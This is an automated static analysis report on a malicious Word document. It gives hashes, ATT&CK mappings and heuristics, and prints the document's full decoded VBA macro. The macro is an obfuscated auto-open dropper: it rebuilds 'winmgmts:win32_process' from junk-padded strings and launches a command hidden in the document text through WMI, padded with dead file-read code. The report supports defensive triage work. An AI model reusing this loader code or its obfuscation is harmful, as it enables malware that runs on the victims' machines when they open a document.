Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 1992656dc5ce0a21…

MALICIOUS

Office (OLE) / .DOC

Size: 86.3 KB
Created: 2020-12-29 14:41:00
Authoring application: Microsoft Office Word
First seen: 2026-05-20
MD5: ded78c7a75cf562048d3e115eabeeb26
SHA-1: 3739ad20de37d0421978f6de8f0835c7a8b7eb57
SHA-256: 1992656dc5ce0a21c226ca246fcc8c7f820976151efab0abcf3e367007523a2a
Risk Score: 112

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1047 Windows Management Instrumentation (WMI)

The sample contains a VBA macro that executes upon opening the document, as indicated by the 'Document_Open' macro and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic. The macro attempts to open and read from multiple local file paths, suggesting it may be part of a larger exploit chain or payload delivery mechanism. The presence of 'CreateObject' calls further supports the execution of arbitrary code.

Heuristics (6)

  • VBA macros detected | severity: medium | OLE_VBA_MACROS (3 related findings)
    Document contains VBA macro code.
  • CreateObject call | severity: high | OLE_VBA_CREATEOBJ
    Matched line in script:
      Set Q_4n_ya4yiwxetc = CreateObject(R6b4ccswmlvumx)
  • VBA p-code auto-exec with execution tokens | severity: high | OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro | severity: low | OLE_VBA_DOCOPEN
    Matched line in script:
      Private Sub Document_open()
  • Suspicious extracted artifact | severity: info | EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL | severity: info | EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (source: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8206 bytes
SHA-256: 80ae34b1231786cce2024dcc6c2e2cffab5869416c48cb5fb08aeea249250618
Detection
  ClamAV: No threats found
  Obfuscation or payload: likely
    113 of 202 identifiers look randomly generated (e.g. 'Buy3ztoge3wcykp4'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "Qd_4ljyi5y20"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
T8dhywc1tfaz639g
End Sub

Attribute VB_Name = "O3ou8d7jy2pk0u"
   

Attribute VB_Name = "Idz6onmd3sgu1i07yn"
Function T8dhywc1tfaz639g()
On Error Resume Next
mKbjhqs = Qd_4ljyi5y20.StoryRanges.Item(244 / 244)
   GoTo ggDyY
Dim QJIoRCCTD() As Byte
Dim HiwNAGIA As Integer
HiwNAGIA = FreeFile
Open "F:\VRcjFSY\BUCVH\xhHZdhHBN.QSsWFFJR" For Binary Access Read As #HiwNAGIA
Open "O:\XMUKF\HOODi\ujgfjJyl.bJwQqgjC" For Binary Access Read As #HiwNAGIA
ReDim QJIoRCCTD(1 To LOF(intGend) - 5)
Get #HiwNAGIA, , QJIoRCCTD
Get #HiwNAGIA, , QJIoRCCTD
Get #HiwNAGIA, , QJIoRCCTD
Close #HiwNAGIA
ggDyY:
snahbsd = "]b2[sp]b2[s"
B96b1ajff94 = "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s"
   GoTo pgGgi
Dim EFhrHY() As Byte
Dim GaGzNcY As Integer
GaGzNcY = FreeFile
Open "F:\qMIvBCBE\eOfgRGkoE\NEMWJEICG.AQoaDEiGA" For Binary Access Read As #GaGzNcY
Open "O:\zvMek\TUaeJ\GijXHS.hJJbEP" For Binary Access Read As #GaGzNcY
ReDim EFhrHY(1 To LOF(intGend) - 5)
Get #GaGzNcY, , EFhrHY
Get #GaGzNcY, , EFhrHY
Get #GaGzNcY, , EFhrHY
Close #GaGzNcY
pgGgi:
Buy3ztoge3wcykp4 = "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s"
   GoTo DbcJHeYYL
Dim gXOmF() As Byte
Dim AjzZYId As Integer
AjzZYId = FreeFile
Open "F:\LuQDBHDEF\OeACpAZ\iJriBEAa.lCiojd" For Binary Access Read As #AjzZYId
Open "O:\PXyrHCm\tGFbD\yPsfFBGGq.qImglUCqo" For Binary Access Read As #AjzZYId
ReDim gXOmF(1 To LOF(intGend) - 5)
Get #AjzZYId, , gXOmF
Get #AjzZYId, , gXOmF
Get #AjzZYId, , gXOmF
Close #AjzZYId
DbcJHeYYL:
Fza0r3mqeq1hqbf = "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s"
   GoTo hbbfCDcZ
Dim XFuaIB() As Byte
Dim NnuAG As Integer
NnuAG = FreeFile
Open "F:\UNzXEFeX\tBHkC\XFmxPvDA.jzSGOFC" For Binary Access Read As #NnuAG
Open "O:\IORRBA\VCPjIQC\vhcRJ.VuKMJJCFD" For Binary Access Read As #NnuAG
ReDim XFuaIB(1 To LOF(intGend) - 5)
Get #NnuAG, , XFuaIB
Get #NnuAG, , XFuaIB
Get #NnuAG, , XFuaIB
Close #NnuAG
hbbfCDcZ:
Urbal2rzukfjj = "]b2[ss]b2[s"
   GoTo doEAlEA
Dim FkxZTGOv() As Byte
Dim vqPbH As Integer
vqPbH = FreeFile
Open "F:\FHMRA\qVZABGBH\aesOHHuE.dbVbo" For Binary Access Read As #vqPbH
Open "O:\pbNVxP\kkHRXcFJI\cdPKF.oMKSoJJGB" For Binary Access Read As #vqPbH
ReDim FkxZTGOv(1 To LOF(intGend) - 5)
Get #vqPbH, , FkxZTGOv
Get #vqPbH, , FkxZTGOv
Get #vqPbH, , FkxZTGOv
Close #vqPbH
doEAlEA:
U88bkdzss44 = Fza0r3mqeq1hqbf + Urbal2rzukfjj + Buy3ztoge3wcykp4 + snahbsd + B96b1ajff94
   GoTo njoTEE
Dim AnbIitGG() As Byte
Dim DmCmD As Integer
DmCmD = FreeFile
Open "F:\LIstAre\sgNeFIC\OCGCJBAI.eCFtUByJS" For Binary Access Read As #DmCmD
Open "O:\pDEtH\tSRcQCJ\MNLAKZ.ptsBJK" For Binary Access Read As #DmCmD
ReDim AnbIitGG(1 To LOF(intGend) - 5)
Get #DmCmD, , AnbIitGG
Get #DmCmD, , AnbIitGG
Get #DmCmD, , AnbIitGG
Close #DmCmD
njoTEE:
R6b4ccswmlvumx = Octr6jprbp1_fe(U88bkdzss44)
   GoTo sJQaBUG
Dim XNSSDQ() As Byte
Dim ADuDfBuJe As Integer
ADuDfBuJe = FreeFile
Open "F:\yTMgCA\LdLdHA\NmXyeIDyB.vbsdbGI" For Binary Access Read As #ADuDfBuJe
Open "O:\lNagKI\yrVFAJBWJ\yOQdkvyw.XOgWJ" For Binary Access Read As #ADuDfBuJe
ReDim XNSSDQ(1 To LOF(intGend) - 5)
Get #ADuDfBuJe, , XNSSDQ
Get #ADuDfBuJe, , XNSSDQ
Get #ADuDfBuJe, , XNSSDQ
Close #ADuDfBuJe
sJQaBUG:
Set Q_4n_ya4yiwxetc = CreateObject(R6b4ccswmlvumx)
   GoTo QIeLAbIH
Dim RwhdALK() As Byte
Dim aQvSF As Integer
aQvSF = FreeFile
Open "F:\FHabq\HKdMLiJ\nfsdt.juXUf" For Binary Access Read As #aQvSF
Open "O:\qvTuwDg\PYDtUC\PYvDRCsGB.pmBYAoSx" For Binary Access Read As #aQvSF
ReDim RwhdALK(1 To LOF(intGend) - 5)
Get #aQvSF, , RwhdALK
Get #aQvSF, , RwhdALK
Get #aQvSF, , RwhdALK
Close #aQvSF
QIeLAbIH:
Mfmqyqy318y = Mid(mKbjhqs, (2 + 3), Len(mKbjhqs))
   GoTo HBYrX
Dim henXvIFBS() As Byte
Dim IZgaeHE As Integer
IZgaeHE = FreeFile
Open "F:\WDXeERv\CaceCE\jEaXB.DyNCDAx" For Binary Access Read As #IZgaeHE
Open "O:\NCEzFJqD\fBoWfA\PTVaGGIgB.yhsJKEG" For Binary Access Read As #IZgaeHE
ReDim henXvIFBS(1 To LOF(intGend) - 5)
Get #IZgaeHE, , henXvIFBS
Get #IZgaeHE, , henXvIFBS
Get #IZgaeHE, , henXvIFBS
Close #IZgaeHE
HBYrX:
   GoTo kTTUerjW
Dim JRFoGAG() As Byte
Dim JhhBQ As Integer
JhhBQ = FreeFile
Open "F:\kEItIJ\MohLTCDli\jUdyJzDGI.MncIPOBF" For Binary Access Read As #JhhBQ
Open "O:\uNvOxl\gMUjlgC\pQzBDo.yovuAWBFE" For Binary Access Read As #JhhBQ
ReDim JRFoGAG(1 To LOF(intGend) - 5)
Get #JhhBQ, , JRFoGAG
Get #JhhBQ, , JRFoGAG
Get #JhhBQ, , JRFoGAG
Close #JhhBQ
kTTUerjW:
Q_4n_ya4yiwxetc.Create Octr6jprbp1_fe(Mfmqyqy318y), Hj4nq52vwv9f8y87, Pvpfok2a7k9xaa
   GoTo bveEDth
Dim PwaItR() As Byte
Dim zzcRDUqvI As Integer
zzcRDUqvI = FreeFile
Open "F:\dFvtFeDQ\nUYeAkH\EtZvqgBD.qFiDWe" For Binary Access Read As #zzcRDUqvI
Open "O:\CLtNZJAX\vvzuMU\nAjQJ.cTYmFItC" For Binary Access Read As #zzcRDUqvI
ReDim PwaItR(1 To LOF(intGend) - 5)
Get #zzcRDUqvI, , PwaItR
Get #zzcRDUqvI, , PwaItR
Get #zzcRDUqvI, , PwaItR
Close #zzcRDUqvI
bveEDth:
   GoTo PCqqvQAH
Dim JSuKFROhF() As Byte
Dim iegMCId As Integer
iegMCId = FreeFile
Open "F:\QMahSB\rnmqE\XJrbTICrA.ZhnfDjDAD" For Binary Access Read As #iegMCId
Open "O:\NoWJDWuEo\vNOaFSF\uHZaO.VaicEH" For Binary Access Read As #iegMCId
ReDim JSuKFROhF(1 To LOF(intGend) - 5)
Get #iegMCId, , JSuKFROhF
Get #iegMCId, , JSuKFROhF
Get #iegMCId, , JSuKFROhF
Close #iegMCId
PCqqvQAH:
End Function
Function Octr6jprbp1_fe(D_us7hrz6rti5ho)
On Error Resume Next
   GoTo AdwWDJ
Dim sGsWI() As Byte
Dim rFzXGH As Integer
rFzXGH = FreeFile
Open "F:\ZilHAFGBD\ODkgRKE\LHeOy.YcnGDGhC" For Binary Access Read As #rFzXGH
Open "O:\zbHkEaHIP\zNMRr\ICNoDJnLi.CtYwUEBIQ" For Binary Access Read As #rFzXGH
ReDim sGsWI(1 To LOF(intGend) - 5)
Get #rFzXGH, , sGsWI
Get #rFzXGH, , sGsWI
Get #rFzXGH, , sGsWI
Close #rFzXGH
AdwWDJ:
A01la80dgscfa = (D_us7hrz6rti5ho)
   GoTo PMoOjD
Dim NLXPBzMI() As Byte
Dim QQGyFm As Integer
QQGyFm = FreeFile
Open "F:\ZedwDsgNG\wHXOue\ofzXAzAG.mVKkRWO" For Binary Access Read As #QQGyFm
Open "O:\SOUbyJAFD\jfAYHx\IvhXd.sDWWF" For Binary Access Read As #QQGyFm
ReDim NLXPBzMI(1 To LOF(intGend) - 5)
Get #QQGyFm, , NLXPBzMI
Get #QQGyFm, , NLXPBzMI
Get #QQGyFm, , NLXPBzMI
Close #QQGyFm
PMoOjD:
Bu9gc8mls85dp = Oowtvwcxwjxa6(A01la80dgscfa)
   GoTo nvAADJJ
Dim pfhZzoE() As Byte
Dim SWcVEbM As Integer
SWcVEbM = FreeFile
Open "F:\liJAk\RGRCpHF\bNAspSF.QynCsII" For Binary Access Read As #SWcVEbM
Open "O:\sPxcF\DAIiBQ\jPGbmHl.tjpwIinBn" For Binary Access Read As #SWcVEbM
ReDim pfhZzoE(1 To LOF(intGend) - 5)
Get #SWcVEbM, , pfhZzoE
Get #SWcVEbM, , pfhZzoE
Get #SWcVEbM, , pfhZzoE
Close #SWcVEbM
nvAADJJ:
Octr6jprbp1_fe = Bu9gc8mls85dp
   GoTo VcWvDJdbs
Dim ZcMmCMG() As Byte
Dim YCjOP As Integer
YCjOP = FreeFile
Open "F:\PodBDaJlA\mxXKEFlDx\cWSMHMW.RYLUJVJe" For Binary Access Read As #YCjOP
Open "O:\yTygPHjf\rcIqUUJv\aEEXdsGyw.HLUGDGQ" For Binary Access Read As #YCjOP
ReDim ZcMmCMG(1 To LOF(intGend) - 5)
Get #YCjOP, , ZcMmCMG
Get #YCjOP, , ZcMmCMG
Get #YCjOP, , ZcMmCMG
Close #YCjOP
VcWvDJdbs:
End Function
Function Oowtvwcxwjxa6(Aofjuh7kd7ne3go3i)
W_ogn6u_usbxc4xj = Kv18y25p6zgn
   GoTo BxuXBgoCG
Dim PQrji() As Byte
Dim hEhFWs As Integer
hEhFWs = FreeFile
Open "F:\cmfYg\atxFn\GJhjFxODz.eAJtV" For Binary Access Read As #hEhFWs
Open "O:\NnAIBDEeI\FPyBAJheE\aSQQR.xGDrEjWc" For Binary Access Read As #hEhFWs
ReDim PQrji(1 To LOF(intGend) - 5)
Get #hEhFWs, , PQrji
Get #hEhFWs, , PQrji
Get #hEhFWs, , PQrji
Close #hEhFWs
BxuXBgoCG:
Oowtvwcxwjxa6 = Replace(Aofjuh7kd7ne3go3i, "]b2[s", Zceoendy3hd)
   GoTo LreOe
Dim kAfLCGBr() As Byte
Dim ePaCEHC As Integer
ePaCEHC = FreeFile
Open "F:\SeKiCHC\XhvwD\eMPhCFH.kPaPI" For Binary Access Read As #ePaCEHC
Open "O:\INXLDyuC\quuLASn\TKWvDFjV.sKbYEBAAk" For Binary Access Read As #ePaCEHC
ReDim kAfLCGBr(1 To LOF(intGend) - 5)
Get #ePaCEHC, , kAfLCGBr
Get #ePaCEHC, , kAfLCGBr
Get #ePaCEHC, , kAfLCGBr
Close #ePaCEHC
LreOe:
End Function